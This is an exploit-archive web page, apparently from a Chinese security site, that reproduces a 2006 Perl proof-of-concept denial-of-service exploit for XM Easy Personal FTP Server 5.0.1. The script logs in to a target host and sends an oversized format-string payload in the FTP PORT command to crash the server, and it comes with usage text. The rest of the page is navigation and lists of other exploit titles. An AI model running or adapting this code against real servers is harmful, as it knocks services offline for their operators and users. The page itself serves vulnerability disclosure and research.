首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XM Easy Personal FTP Server 5.0.1 (Port) Remote Overflow PoC
来源:www.securinfos.info 作者:Jerome 发布时间:2006-06-27  

#!/usr/bin/perl

# -----------------------------------------------------------
# Name : XM Easy Personal FTP Server
# Version : 5.0.1
# -----------------------------------------------------------
# Type : dos / remote
# Multiple buffer overflows
# Port and multiple commands with A%n, ...
# -----------------------------------------------------------
# Jerome Athias - https://www.securinfos.info
# -----------------------------------------------------------

use Net::FTP;

$host = @ARGV[0];

if ($host)
{
print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info";
$ftp = Net::FTP->new($host, Debug => 0);
$ftp->login('test','test'); #Maybe anonymous works ;-)
$ftp->port("\x41\x25\x6E"x9999);
}
else {
print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info\n\n- Usage: $0 host\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BitchX <= 1.1-final do_hook
·MyBulletinBoard (MyBB) <= 1
·Jaws <= 0.6.2 (Search gadge
·DeluxeBB <= 1.07 (cp.php) C
·DataLife Engine <= 4.1 Remo
·DreamAccount <= 3.1 (auth.a
·DataLife Engine <= 4.1 Remo
·NIPrint LPD Request Overflow
·Winamp <= 5.21 (Midi File H
·Cesar FTP 0.99g MKD Command Bu
·Microsoft Excel Unicode Local
·Microsoft RRAS MSO6-025 Stack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved